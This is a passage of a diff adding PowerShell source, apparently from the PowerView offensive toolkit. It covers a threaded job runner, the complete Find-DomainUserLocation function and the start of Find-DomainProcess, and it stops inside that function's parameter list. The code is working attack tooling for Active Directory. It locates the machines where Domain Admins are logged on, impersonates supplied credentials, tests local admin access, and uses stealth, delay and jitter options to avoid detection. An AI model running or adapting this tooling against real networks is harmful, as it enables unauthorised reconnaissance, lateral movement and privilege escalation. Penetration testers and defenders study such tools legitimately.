+ # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407
+ # Thanks Carlos!
+
+ # create a pool of maxThread runspaces
+ $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
+ $Pool.Open()
+
+ # do some trickery to get the proper BeginInvoke() method that allows for an output queue
+ $Method = $Null
+ ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) {
+ $MethodParameters = $M.GetParameters()
+ if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') {
+ $Method = $M.MakeGenericMethod([Object], [Object])
+ break
+ }
+ }
+
+ $Jobs = @()
+ $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()}
+ Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)"
+
+ # partition all hosts from -ComputerName into $Threads number of groups
+ if ($Threads -ge $ComputerName.Length) {
+ $Threads = $ComputerName.Length
+ }
+ $ElementSplitSize = [Int]($ComputerName.Length/$Threads)
+ $ComputerNamePartitioned = @()
+ $Start = 0
+ $End = $ElementSplitSize
+
+ for($i = 1; $i -le $Threads; $i++) {
+ $List = New-Object System.Collections.ArrayList
+ if ($i -eq $Threads) {
+ $End = $ComputerName.Length
+ }
+ $List.AddRange($ComputerName[$Start..($End-1)])
+ $Start += $ElementSplitSize
+ $End += $ElementSplitSize
+ $ComputerNamePartitioned += @(,@($List.ToArray()))
+ }
+
+ Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads"
+
+ ForEach ($ComputerNamePartition in $ComputerNamePartitioned) {
+ # create a "powershell pipeline runner"
+ $PowerShell = [PowerShell]::Create()
+ $PowerShell.runspacepool = $Pool
+
+ # add the script block + arguments with the given computer partition
+ $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition)
+ if ($ScriptParameters) {
+ ForEach ($Param in $ScriptParameters.GetEnumerator()) {
+ $Null = $PowerShell.AddParameter($Param.Name, $Param.Value)
+ }
+ }
+
+ # create the output queue
+ $Output = New-Object Management.Automation.PSDataCollection[Object]
+
+ # kick off execution using the BeginInvok() method that allows queues
+ $Jobs += @{
+ PS = $PowerShell
+ Output = $Output
+ Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output))
+ }
+ }
+ }
+
+ END {
+ Write-Verbose "[New-ThreadedFunction] Threads executing"
+
+ # continuously loop through each job queue, consuming output as appropriate
+ Do {
+ ForEach ($Job in $Jobs) {
+ $Job.Output.ReadAll()
+ }
+ Start-Sleep -Seconds 1
+ }
+ While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0)
+
+ $SleepSeconds = 100
+ Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..."
+
+ # cleanup- make sure we didn't miss anything
+ for ($i=0; $i -lt $SleepSeconds; $i++) {
+ ForEach ($Job in $Jobs) {
+ $Job.Output.ReadAll()
+ $Job.PS.Dispose()
+ }
+ Start-Sleep -S 1
+ }
+
+ $Pool.Dispose()
+ Write-Verbose "[New-ThreadedFunction] all threads completed"
+ }
+}
+
+
+function Find-DomainUserLocation {
+<#
+.SYNOPSIS
+
+Finds domain machines where specific users are logged into.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
+
+.DESCRIPTION
+
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed. If -ShowAll is specified, all results are displayed instead of
+the filtered set. If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers. If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+.PARAMETER ComputerName
+
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+.PARAMETER Domain
+
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+.PARAMETER ComputerDomain
+
+Specifies the domain to query for computers, defaults to the current domain.
+
+.PARAMETER ComputerLDAPFilter
+
+Specifies an LDAP query string that is used to search for computer objects.
+
+.PARAMETER ComputerSearchBase
+
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
+
+.PARAMETER ComputerUnconstrained
+
+Switch. Search computer objects that have unconstrained delegation.
+
+.PARAMETER ComputerOperatingSystem
+
+Search computers with a specific operating system, wildcards accepted.
+
+.PARAMETER ComputerServicePack
+
+Search computers with a specific service pack, wildcards accepted.
+
+.PARAMETER ComputerSiteName
+
+Search computers in the specific AD Site name, wildcards accepted.
+
+.PARAMETER UserIdentity
+
+Specifies one or more user identities to search for.
+
+.PARAMETER UserDomain
+
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+.PARAMETER UserLDAPFilter
+
+Specifies an LDAP query string that is used to search for target users.
+
+.PARAMETER UserSearchBase
+
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
+
+.PARAMETER UserGroupIdentity
+
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+.PARAMETER UserAdminCount
+
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+.PARAMETER UserAllowDelegation
+
+Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
+
+.PARAMETER CheckAccess
+
+Switch. Check if the current user has local admin access to computers where target users are found.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
+
+.PARAMETER StopOnSuccess
+
+Switch. Stop hunting after finding after finding a target user.
+
+.PARAMETER Delay
+
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+.PARAMETER Jitter
+
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+.PARAMETER ShowAll
+
+Switch. Return all user location results instead of filtering based on target
+specifications.
+
+.PARAMETER Stealth
+
+Switch. Only enumerate sessions from connonly used target servers.
+
+.PARAMETER StealthSource
+
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
+
+.PARAMETER Threads
+
+The number of threads to use for user searching, defaults to 20.
+
+.EXAMPLE
+
+Find-DomainUserLocation
+
+Searches for 'Domain Admins' by enumerating every computer in the domain.
+
+.EXAMPLE
+
+Find-DomainUserLocation -Stealth -ShowAll
+
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
+
+.EXAMPLE
+
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
+
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
+
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.UserLocation
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.UserLocation')]
+ [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
+ [String[]]
+ $ComputerName,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $ComputerDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $ComputerLDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $ComputerSearchBase,
+
+ [Alias('Unconstrained')]
+ [Switch]
+ $ComputerUnconstrained,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
+ [String]
+ $ComputerOperatingSystem,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
+ [String]
+ $ComputerServicePack,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
+ [String]
+ $ComputerSiteName,
+
+ [Parameter(ParameterSetName = 'UserIdentity')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $UserIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $UserDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $UserLDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $UserSearchBase,
+
+ [Parameter(ParameterSetName = 'UserGroupIdentity')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('GroupName', 'Group')]
+ [String[]]
+ $UserGroupIdentity = 'Domain Admins',
+
+ [Alias('AdminCount')]
+ [Switch]
+ $UserAdminCount,
+
+ [Alias('AllowDelegation')]
+ [Switch]
+ $UserAllowDelegation,
+
+ [Switch]
+ $CheckAccess,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $StopOnSuccess,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
+
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
+
+ [Parameter(ParameterSetName = 'ShowAll')]
+ [Switch]
+ $ShowAll,
+
+ [Switch]
+ $Stealth,
+
+ [String]
+ [ValidateSet('DFS', 'DC', 'File', 'All')]
+ $StealthSource = 'All',
+
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
+
+ BEGIN {
+
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ $UserSearcherArguments = @{
+ 'Properties' = 'samaccountname'
+ }
+ if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+ if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+ if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+ if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+ $TargetComputers = @()
+
+ # first, build the set of computers to enumerate
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = @($ComputerName)
+ }
+ else {
+ if ($PSBoundParameters['Stealth']) {
+ Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource"
+ $TargetComputerArrayList = New-Object System.Collections.ArrayList
+
+ if ($StealthSource -match 'File|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for file servers'
+ $FileServerSearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential }
+ $FileServers = Get-DomainFileServer @FileServerSearcherArguments
+ if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) }
+ $TargetComputerArrayList.AddRange( $FileServers )
+ }
+ if ($StealthSource -match 'DFS|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers'
+ # # TODO: fix the passed parameters to Get-DomainDFSShare
+ # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName}
+ }
+ if ($StealthSource -match 'DC|All') {
+ Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers'
+ $DCSearcherArguments = @{
+ 'LDAP' = $True
+ }
+ if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
+ $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
+ if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) }
+ $TargetComputerArrayList.AddRange( $DomainControllers )
+ }
+ $TargetComputers = $TargetComputerArrayList.ToArray()
+ }
+ else {
+ Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
+ }
+ }
+ Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainUserLocation] No hosts found to enumerate'
+ }
+
+ # get the current user so we can ignore it in the results
+ if ($PSBoundParameters['Credential']) {
+ $CurrentUser = $Credential.GetNetworkCredential().UserName
+ }
+ else {
+ $CurrentUser = ([Environment]::UserName).ToLower()
+ }
+
+ # now build the user target set
+ if ($PSBoundParameters['ShowAll']) {
+ $TargetUsers = @()
+ }
+ elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or
$PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)" + if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) { + throw '[Find-DomainUserLocation] No users found to target' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $Sessions = Get-NetSession -ComputerName $TargetComputer + ForEach ($Session in $Sessions) { + $UserName = $Session.UserName 
+ $CName = $Session.CName + + if ($CName -and $CName.StartsWith('\\')) { + $CName = $CName.TrimStart('\') + } + + # make sure we have a result, and ignore computer$ sessions + if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) { + + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) { + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' $Null + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName + + # try to resolve the DNS hostname of $Cname + try { + $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName + $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName + } + catch { + $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null + } + + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } + } + } + if (-not $Stealth) { + # if we're not 'stealthy', enumerate loggedon users as well + $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer + ForEach ($User in $LoggedOn) { + $UserName = $User.UserName + $UserDomain = $User.LogonDomain + + # make sure wet have a result + if (($UserName) -and ($UserName.trim() -ne '')) { + if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) { + $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress + $UserLocation = New-Object PSObject + $UserLocation | Add-Member Noteproperty 'UserDomain' 
$UserDomain + $UserLocation | Add-Member Noteproperty 'UserName' $UserName + $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer + $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress + $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null + $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null + + # see if we're checking to see if we have local admin access on this machine + if ($CheckAccess) { + $Admin = Test-AdminAccess -ComputerName $TargetComputer + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin + } + else { + $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null + } + $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') + $UserLocation + } + } + } + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken + + if ($Result -and $StopOnSuccess) { + Write-Verbose 
"[Find-DomainUserLocation] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads" + Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TargetUsers' = $TargetUsers + 'CurrentUser' = $CurrentUser + 'Stealth' = $Stealth + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-DomainProcess { +<# +.SYNOPSIS + +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. 
+If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER Domain + +Specifies the domain to query for computers AND users, defaults to the current domain. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerUnconstrained + +Switch. Search computer objects that have unconstrained delegation. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER ProcessName + +Search for processes with one or more specific names. + +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. + +.PARAMETER UserDomain + +Specifies the domain to query for users to search for, defaults to the current domain. + +.PARAMETER UserLDAPFilter + +Specifies an LDAP query string that is used to search for target users. + +.PARAMETER UserSearchBase + +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER UserGroupIdentity + +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +.PARAMETER UserAdminCount + +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). 
+ +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER StopOnSuccess + +Switch. Stop hunting after finding after finding a target user. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainProcess + +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +.EXAMPLE + +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +.EXAMPLE + +Find-DomainProcess -ProcessName putty.exe + +Searchings for instances of putty.exe running on the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. 
+ +.OUTPUTS + +PowerView.UserProcess +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.UserProcess')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [Alias('Unconstrained')] + [Switch] + $ComputerUnconstrained, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ParameterSetName = 'TargetProcess')] + [ValidateNotNullOrEmpty()] + [String[]] + $ProcessName, + + [Parameter(ParameterSetName = 'TargetUser')] + [Parameter(ParameterSetName = 'UserIdentity')] + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserDomain, + + [Parameter(ParameterSetName = 